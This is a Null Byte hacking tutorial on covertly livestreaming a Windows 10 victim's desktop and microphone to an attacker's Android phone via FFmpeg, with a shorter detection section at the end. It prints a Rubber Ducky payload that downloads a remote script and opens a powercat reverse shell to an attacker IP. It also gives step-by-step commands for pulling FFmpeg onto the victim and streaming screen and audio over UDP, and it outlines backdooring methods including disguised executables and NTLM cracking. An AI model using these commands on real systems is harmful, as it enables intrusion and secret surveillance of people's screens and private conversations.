
How to Backdoor Windows 10 and Livestream the Desktop (Without RDP) «Null Byte :: WonderHowTo



The Windows 10 desktop and microphone can be livestreamed without using Remote Desktop Protocol (RDP) software and without opening any ports on the target computer. A low-privilege attacker can monitor, in real time, every movement and private conversation of a target, wherever they are. The attacker sees and hears everything, and there are few ways to protect yourself.

FFmpeg Attack Information

FFmpeg is a multimedia framework that can encode, stream, and play most file formats on Windows, macOS, and Unix distributions. It is portable and stand-alone, i.e., it can run as a single executable without installation or configuration.

The attacker installs FFmpeg on both the attacking system and the Windows 10 target computer. A listener on the Android attack system intercepts the incoming video stream from the Windows 10 computer; the stream is saved to a local file and played back on the Android device.

Here's an example of a livestream created from a compromised Windows 10 desktop and intercepted with an Android phone. The frame rate is deliberately low to minimize the CPU load on the target computer and to keep the video file (AVI) on the Android small.

Much as macOS can be hacked to secretly livestream the entire desktop, Windows 10 is vulnerable to the same kind of attack. Even at a low frame rate, an attacker can monitor every movement of a target in real time.

These attacks can be carried out quickly without administrator rights by simply downloading the FFmpeg executable and running a single command. The whole thing happens without the target's knowledge and without antivirus software noticing.

Step 1: Backdoor the Windows 10 Target Computer

This article assumes that a remote backdoor (Netcat) has already been set up. There are several ways to gain control of a Windows 10 device, including:

Option 1: USB Rubber Ducky

The USB Rubber Ducky is a popular keystroke-injection tool. As shown in my other guide on using an Android phone and a USB Rubber Ducky to backdoor Windows 10, the Ducky payload below can set up a root shell within seconds using PowerShell.

  DELAY 5500
  GUI r
  DELAY 700
  STRING powershell /w 1 /C $a=$env:TEMP; Set-ExecutionPolicy Bypass; wget https://cutt.ly/cW13i -o $a\d.ps1; ipmo $a\d.ps1; powercat -c 192.168.0.208 -p 1234 -e powershell
  CTRL-SHIFT
  DELAY 850
  ALT y


Option 2: Bypassing the Login Password

Similarly, if physical access is possible, a Windows 10 computer can be backdoored by dropping a malicious file into the StartUp directory.

Windows maintains "startup" folders whose contents are launched automatically at boot. This is a convenience feature: users can place shortcuts to legitimate applications (web browsers, word processors, media players) and scripts in the StartUp folder. Attackers frequently abuse StartUp folders to maintain a degree of persistence on the device.

In my guide to breaking into a Windows 10 computer without a password, the Windows 10 device is remotely controlled with a simple Msfvenom payload. Realistically, however, a more advanced, undetectable payload or a sophisticated PowerShell payload would be used to maintain persistence.

Option 3: USB Dead Drop

USB dead drops are a useful technique for compromising computers. The topic is discussed in detail in my guide to hacking WPA2 Wi-Fi passwords with a USB dead drop. The payload proposed there is designed to exfiltrate Wi-Fi passwords, but it can be swapped for other PowerShell payloads that talk to a Netcat listener.

With no detectable payload, executables can be made to look like ordinary PDF and TXT files, which also allows malicious attachments to be sent by e-mail. Below is a GIF of an executable disguised as a text file.

Make no mistake: the file on the right is an executable. When the fake text file is clicked, a new document opens in Notepad, the default text editor in Windows 10. After Notepad opens, an embedded PowerShell payload runs and creates a backdoor on the Windows 10 computer.

Option 5: Capture and Crack the Login Password

When the attacker shares a Wi-Fi network with the Windows 10 target computer, NTLM hashes (shown in red below) can be intercepted.

NTLM credentials are based on data obtained during the interactive logon process and consist of a domain name, a user name, and a one-way hash of the user's password. NTLM uses an encrypted challenge/response protocol to authenticate a user without sending the user's password over the network in plaintext.

Unfortunately, the HMAC-MD5 hash algorithm used by NTLM remains very vulnerable to brute-force attacks, which allow tens of millions of password attempts per minute, even when the attack is run from older Android phones and Raspberry Pis.

In my guide to intercepting and decrypting Windows passwords, the attack is covered in more detail. Once the target's login password has been brute-forced, it is possible to log in and quickly embed a backdoor using a scheduled task or the StartUp folder.

Option 6: Social Engineering (Other Tactics)

There is no telling how many different ways a target can be persuaded to open a file containing stagers or payloads. Innocuous items such as birthday cards or sticky notes can be used to lure and disarm unsuspecting targets. Everyday objects can kick off complex social engineering hacks, as shown in my guide to hacking Wi-Fi passwords with a birthday card.

Birthday card sent to the target, with the payload stored on a microSD card.

The payload described in that article can also be replaced by another, more complex PowerShell script. It's the social engineering and human-hacking aspect that should be taken into consideration.

Step 2: Setting Up the UserLAnd App on Android

UserLAnd is an Android app that allows Linux distributions to be installed alongside the Android operating system. This is done entirely without rooting or wiping the Android device. Lightweight Kali or Debian systems can be up and running in minutes with just a few taps.

A Kali operating system is required. For more information, see distortion's guide to turning an Android phone into a hacking device without root, and my guide to hacking WPA2 Wi-Fi passwords with Android. Both cover the basics of UserLAnd and the setup of Kali Linux, Ngrok, and the required software.

Once everything is installed and configured, connect to the operating system through ConnectBot (or JuiceSSH, or the built-in SSH client).

Step 3: Install FFmpeg in Kali on Android

First, FFmpeg must be installed on the attacker's device in order to intercept the livestream from the hacked Windows 10 computer. Install FFmpeg in Kali (UserLAnd) with the following command.

  sudo apt-get update && sudo apt-get install ffmpeg

Step 4: Launch the FFmpeg Listener from Android

Start the FFmpeg listener with the following command.

  screen ffmpeg -i udp://0.0.0.0:10001 /sdcard/Download/livestream.avi

Screen is placed in front of the command so that the UserLAnd SSH session can be closed without stopping the running FFmpeg command. Screen is used here to teach readers how to use it, since it makes switching between shells easier.

This FFmpeg command opens UDP port (udp://) 10001 and accepts input (-i) streams on any available interface (0.0.0.0). The stream is then saved in AVI format under the file name "livestream.avi" in the directory /sdcard/Download/. The port number and file name can be changed if necessary, but always use the /sdcard/Download/ directory so that the file is accessible to the Android operating system and the VLC app.

To detach from the screen session without stopping the FFmpeg listener, press Ctrl-a, then d.

Step 5: Install FFmpeg on the Backdoored Windows 10 Computer

All of the following commands in steps 5, 6, and 7 are executed on the backdoored Windows 10 device. These steps assume that a Netcat shell has been set up.

Run the following Invoke-WebRequest (iwr) command to download the FFmpeg ZIP file to the Windows 10 computer. At the time of this writing, the latest version is v20190506-fec4212. Using the Android web browser, go to ffmpeg.zeranoe.com/builds/ and copy the URL of the latest version from there.

  iwr -Uri 'https://ffmpeg.zeranoe.com/builds/win64/static/ffmpeg-20190506-fec4212-win64-static.zip' -OutFile $env:TEMP\ffmpeg.zip

Invoke-WebRequest fetches (-Uri) the FFmpeg ZIP and saves it (-OutFile) in the temporary directory ($env:TEMP) under the file name ffmpeg.zip.

Step 6: Extract the Archive

PowerShell versions 5.1 and above have a convenient decompression feature called Expand-Archive. It can be used to quickly unpack the ffmpeg.zip file in the target's Temp directory.

  Expand-Archive -Path $env:TEMP\ffmpeg.zip -DestinationPath $env:TEMP\ffmpeg

Expand-Archive takes the input file ($env:TEMP\ffmpeg.zip) and unpacks it (-DestinationPath) into a new folder named ffmpeg.

When this is done, change (cd) into the new ffmpeg directory. Use the wildcard (*) as shown below so that the version number in the directory name is completed automatically.

  cd "$env:TEMP\ffmpeg\ffmpeg*\bin"

Then list the files in the directory to make sure ffmpeg.exe is available.

  ls

      Directory: C:\Users\IEUser\AppData\Local\Temp\ffmpeg\ffmpeg-20190116-51978ae-win64-static\bin

  Mode                LastWriteTime         Length Name
  ----                -------------         ------ ----
  -a----        1/16/2019   4:14 AM       64969728 ffmpeg.exe
  -a----        1/16/2019   4:14 AM       64856064 ffplay.exe
  -a----        1/16/2019   4:14 AM       64877568 ffprobe.exe

As you can see, the executable is available. It is now possible to livestream the target's entire desktop.

Step 7: Livestream the Windows 10 Desktop

FFmpeg supports several useful output formats. It can stream the entire desktop with or without audio from the target's microphone. The following covers streaming video only, audio only, and video and audio at the same time.

Option 1: Video Streaming Only

To stream only the target's entire desktop, run the following ffmpeg.exe command from the Netcat backdoor.

  .\ffmpeg.exe -f gdigrab -i desktop -f dshow -f avi udp://192.168.0.208:10001

The Windows components Graphics Device Interface (-f gdigrab) and DirectShow (-f dshow) are responsible for rendering graphics and sending them to connected monitors and printers. FFmpeg essentially taps these components (-i desktop) and sends the output (udp://) to the attacker's server in AVI format (-f avi).

When using the above command, remember to change the attacker's IP address (192.168.0.208) to the IP address of the Android device hosting the FFmpeg listener. While the computer is livestreaming, the video will be available in the Android Downloads app (or in the Downloads folder in Files, My Files, or a similarly named app).

To learn more about GDI and DirectShow and the available command arguments, see the FFmpeg documentation for gdigrab, desktop, and dshow.

Option 2: Audio Streaming Only

In some scenarios, it may be preferable to stream only the audio from the compromised computer. In that case, first list the input interfaces built into the Windows 10 computer.

  .\ffmpeg.exe -list_devices true -f dshow -i dummy

  ffmpeg version N-92981-g51978aefe8 Copyright (c) 2000-2019 the FFmpeg developers
    built with gcc 8.2.1 (GCC) 20181201

  [dshow @ 0000021d3560a480] DirectShow audio devices
  [dshow @ 0000021d3560a480]  "Microphone (Realtek High Definition Audio)"
  [dshow @ 0000021d3560a480]     Alternative name "@device_cm_{XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX}\wave_{XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX}"

Note the "Microphone (Realtek High Definition Audio)" interface in my FFmpeg output. Depending on the hardware and microphone in the backdoored Windows 10 computer, yours may look different.

Copy the name of the audio interface exactly into the following command, enclosed in double quotes.

  .\ffmpeg.exe -f dshow -i audio="Microphone (Realtek High Definition Audio)" -f avi udp://192.168.0.208:10001

The -i argument tells FFmpeg to use the audio= input while streaming to the attacker's server.

Option 3: Video and Audio Streaming Simultaneously

Use the following command to stream the entire desktop while also recording audio.

  .\ffmpeg.exe -f dshow -i audio="Microphone (Realtek High Definition Audio)":video="desktop" -f avi udp://192.168.0.208:10001

As with the audio= argument, here the two inputs video= and audio= are both streamed to the attacker's server. The input devices are separated by a colon (:) and must always be enclosed in double quotes.

Step 8: Watch & Listen to the Stream in Real Time

The built-in Android video player cannot play the streamed video/audio while the file is still being actively written (streamed). Other notable video players can play files this way, but only VLC was tested for this article. Feel free to substitute another, equally capable video player. VLC is available through the F-Droid repository and the Google Play Store.

After installing VLC, go to the Android Downloads app (or the Downloads folder in Files, My Files, or a similarly named app) to find livestream.avi. Note how the file size keeps growing as the Windows 10 desktop is streamed into the file.

To open the file in VLC, long-press the AVI file, then choose either the additional-options icon followed by "Open With" or the share button, and tap "VLC" or "Play with VLC". VLC will play the file for as long as the FFmpeg connection remains established.

How to Protect Yourself from FFmpeg Attacks

It is unlikely that antivirus software will catch this type of attack on Windows 10. After all, FFmpeg is not considered a malicious application: it does not try to open ports or modify sensitive files on the computer.

Option 1: Search for Potentially Malicious Apps

If you've never heard of FFmpeg and are sure it was not installed by some other application, then FFmpeg probably has no business being on the computer. A simple search helps locate related files.

First, open File Explorer and click "This PC" in the left column. This step is important; otherwise only the current directory is searched. Then search for "ffmpeg" in the upper right corner.

Note the FFmpeg EXE and related files in the Temp directory. At this point, it is probably best to disconnect the computer from the internet and the router and begin a forensic investigation into who compromised the device and when.

Option 2: Use Task Manager to Find Apps That Steal Data

While the computer is actively livestreaming data, the Windows 10 Task Manager can be used to show running background processes, applications, and services. It can also be used to analyze system resources, for example to identify applications that consume excessive RAM or CPU.

To open Task Manager, search for "Task Manager" and run it as administrator by right-clicking it. Task Manager must be started with administrator privileges to display everything being executed from a root backdoor.

Note "ffmpeg.exe" using 30% of the CPU. A patient attacker can tweak the FFmpeg command to minimize the overall CPU load, so it may not always be detectable this way.

To stop FFmpeg, right-click the process and select "End task." Again, it is probably best to immediately disconnect the computer from the internet and the router.
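The File Explorer search in Option 1 and the Task Manager check in Option 2 can be combined into one script. The PowerShell below is an added example, not code from the article or from the FFmpeg project: it lists ffmpeg/ffplay/ffprobe binaries found in the Temp directories, lists everything in both StartUp folders (the persistence location mentioned in Step 1), hashes each hit, and then lists every process that currently owns a UDP socket together with its CPU time, its UDP ports, and whether its image runs from a Temp directory, which is what catches a renamed binary that the Task Manager name column would miss. It assumes Windows 10 with the NetTCPIP module (Get-NetUDPEndpoint) and an elevated PowerShell session; the variable names are my own.

```powershell
# Added defender example; not code from the article or from the FFmpeg project.
# Run from an elevated PowerShell on Windows 10 (needs the NetTCPIP module for
# Get-NetUDPEndpoint) so that other users' processes and sockets are visible.

# 1. FFmpeg binaries dropped into a Temp directory (the location used above).
$tempRoots = @($env:TEMP, "$env:SystemRoot\Temp") | Where-Object { Test-Path $_ }
$ffmpegFiles = Get-ChildItem -Path $tempRoots -Recurse -File -ErrorAction SilentlyContinue |
    Where-Object { $_.Name -match '^ff(mpeg|play|probe)\.exe$' }

# 2. Everything in the per-user and all-users StartUp folders, since those are
#    the persistence locations the article warns about.
$startupDirs = @(
    "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup",
    "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"
) | Where-Object { Test-Path $_ }
$startupFiles = @()
if ($startupDirs) {
    $startupFiles = Get-ChildItem -Path $startupDirs -File -ErrorAction SilentlyContinue
}

# Hash every hit so the evidence can be compared against known builds later.
$fileReport = @($ffmpegFiles) + @($startupFiles) | ForEach-Object {
    [pscustomobject]@{
        Path          = $_.FullName
        SizeBytes     = $_.Length
        LastWriteTime = $_.LastWriteTime
        SHA256        = (Get-FileHash -Path $_.FullName -Algorithm SHA256).Hash
    }
}

# 3. Processes that currently own a UDP socket. The stream leaves over UDP, so
#    a renamed ffmpeg.exe still shows up here even if its name looks benign.
$udpEndpoints = Get-NetUDPEndpoint
$udpOwners    = $udpEndpoints | Select-Object -ExpandProperty OwningProcess -Unique
$processReport = Get-Process | Where-Object { $udpOwners -contains $_.Id } | ForEach-Object {
    $p = $_
    $ports = ($udpEndpoints | Where-Object { $_.OwningProcess -eq $p.Id } |
              Select-Object -ExpandProperty LocalPort | Sort-Object -Unique) -join ','
    # An image running from a Temp directory is suspicious whatever its name.
    $inTemp = $false
    if ($p.Path) {
        foreach ($root in $tempRoots) {
            if ($p.Path.StartsWith($root, [System.StringComparison]::OrdinalIgnoreCase)) { $inTemp = $true }
        }
    }
    # CPU can be inaccessible for protected processes; treat that as 0.
    $cpu = 0
    if ($p.CPU) { $cpu = [math]::Round($p.CPU, 1) }
    [pscustomobject]@{
        Id         = $p.Id
        Name       = $p.ProcessName
        CpuSeconds = $cpu
        UdpPorts   = $ports
        InTemp     = $inTemp
        Path       = $p.Path
    }
}

"== FFmpeg binaries in Temp and StartUp folder contents =="
$fileReport | Format-Table -AutoSize
"== Processes owning UDP sockets, highest CPU first =="
$processReport | Sort-Object CpuSeconds -Descending | Format-Table -AutoSize
# Equivalent of Task Manager's "End task" once a process has been confirmed:
#   Stop-Process -Id <pid> -Force
```

The process table is the useful part when the binary has been renamed: a process with a generic name, a Temp path, a UDP socket, and a climbing CPU figure is the pattern this article describes, and the SHA-256 column lets you check the dropped file against a known FFmpeg build before drawing conclusions.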

Option 3: Use Wireshark to find data-stealing apps

Remember that a clever attacker can rename ffmpeg.exe to something less obvious, such as "explorer.exe" or "service host." For a more complete picture of the data leaving the Windows 10 computer, download and install the latest version of Wireshark. Be sure to install WinPcap during setup, as it is a required dependency of Wireshark.

Open Wireshark and start capturing on all available interfaces. When an attacker is actively livestreaming the desktop, a large amount of data will be seen leaving the network.

It can be hard to identify a large amount of data leaving the computer as malicious. Windows 10 does a number of things in the background that could be interpreted as shady, and analyzing individual packets will not help much either. If it is an FFmpeg attack, however, it can be identified with certainty using the following method.

First, right-click one of the UDP packets and select "Follow," then "UDP Stream."

A new Wireshark window opens. Notice the "Client Pkts" counter in the lower left corner; it will keep increasing while Wireshark assembles the UDP packets into a single stream. Be patient here: if the attacker has been livestreaming for a long time, it may take several minutes for Wireshark to finish.

When Wireshark finishes, the "Show and save data as" option becomes available. Change the setting to "Raw" and wait for Wireshark to finish compiling again.

Then click the "Save as..." button and save the data under the file name "ive_been_hacked.avi". The video can then be played with the Windows 10 video player. If the AVI playback is clearly a video of your entire desktop or an audio recording of your private conversations, your computer has been hacked. Disconnect it from the router immediately.
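The "play it and see" check above can be backed up with a header check on the saved raw stream, which also explains the failure case where the file refuses to play. The PowerShell below is an added example, not code from the article: an AVI container starts with a RIFF chunk (bytes 0-3 "RIFF", bytes 4-7 a little-endian size, bytes 8-11 the form type "AVI "), and FFmpeg's "-f avi" muxer emits that header at the very start of the stream, so it appears at offset 0 of the reassembled UDP payload only if the capture was already running when the stream began. The file path and function names are my assumptions, and the sample bytes are constructed, not taken from a real capture.

```powershell
# Added defender example; not code from the article. Checks whether the raw
# UDP payload saved from Wireshark ("Follow UDP Stream" -> Raw -> Save as...)
# really is an AVI container, i.e. starts with "RIFF" .... "AVI ".

function Test-AviHeader {
    param([Parameter(Mandatory)][byte[]]$Bytes)
    if ($Bytes.Length -lt 12) { return $false }
    $riff = [System.Text.Encoding]::ASCII.GetString($Bytes, 0, 4)
    $form = [System.Text.Encoding]::ASCII.GetString($Bytes, 8, 4)
    # -ceq is case-sensitive, so "riff"/"avi " are not accepted by mistake.
    return ($riff -ceq 'RIFF' -and $form -ceq 'AVI ')
}

function Test-AviFile {
    param([Parameter(Mandatory)][string]$Path)
    $stream = [System.IO.File]::OpenRead($Path)
    try {
        $header = New-Object byte[] 12
        $read = $stream.Read($header, 0, 12)   # only the first 12 bytes matter
    } finally {
        $stream.Dispose()
    }
    if ($read -lt 12) { return $false }
    return Test-AviHeader -Bytes $header
}

# Constructed sample bytes (not a real capture): first, the 12 bytes an FFmpeg
# AVI stream starts with; second, a fragment from the middle of a stream
# (a "00dc" video chunk id), which is what a capture started late looks like.
$ascii      = [System.Text.Encoding]::ASCII
$streamHead = $ascii.GetBytes('RIFF') + [byte[]](0xFF, 0xFF, 0xFF, 0xFF) + $ascii.GetBytes('AVI ')
$midStream  = $ascii.GetBytes('00dc') + [byte[]]::new(8)
"constructed stream head recognised as AVI:  $(Test-AviHeader -Bytes $streamHead)"
"mid-stream fragment recognised as AVI:      $(Test-AviHeader -Bytes $midStream)"

# Path is an assumption; point it at the file saved from Wireshark.
$saved = "$env:USERPROFILE\Downloads\ive_been_hacked.avi"
if (Test-Path $saved) {
    if (Test-AviFile -Path $saved) {
        "AVI header present: the UDP stream is an AVI container (FFmpeg -f avi)."
    } else {
        "No AVI header at offset 0: the capture started after the stream began, or another container is in use."
    }
}
```

The second constructed sample is the caveat: if Wireshark was started while the livestream was already running, the RIFF header was sent before the capture began, the saved file will not play in any video player, and this check returns False even though the attack is the same. In that situation the evidence is the steady, high-volume UDP flow from one local process to a single remote address and port, which the process listing from Option 2 ties back to the sending executable.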

That covers both running and detecting FFmpeg attacks. Follow me on Twitter @tokyoneon_ and let me know if you have any questions or concerns, there or below in the comments.


Title image and screenshots of Tokyoneon / Null Byte



